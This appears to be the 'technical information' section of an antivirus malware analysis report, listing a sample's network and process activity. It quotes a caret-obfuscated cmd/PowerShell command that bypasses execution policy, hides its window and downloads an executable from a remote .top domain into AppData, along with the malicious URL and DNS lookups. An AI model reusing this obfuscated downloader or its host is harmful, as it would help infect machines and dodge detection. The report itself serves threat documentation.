Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^W^e^r^s^HEl^l.^E^XE ^-ex^Ec^utION^Po^LIcY ByPass^ ^-NoProFI^L^e^ -wi^ND^owStYLe^ ^H^idde^N (NE^w-o^BJE^ct sYSTeM.^NEt^.wEbCL^IeN^t)^.Down^Loa^dfiLe^(^'http://aloepolera.top/r...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /C "PO^W^e^r^s^HEl^l.^E^XE ^-ex^Ec^utION^Po^LIcY ByPass^ ^-NoProFI^L^e^ -wi^ND^owStYLe^ ^H^idde^N (NE^w-o^BJE^ct sYSTeM.^NEt^.wEbCL^IeN^t)^.Down^Loa^dfiLe^(^'http://aloepolera.top/r...' (со скрытым окном)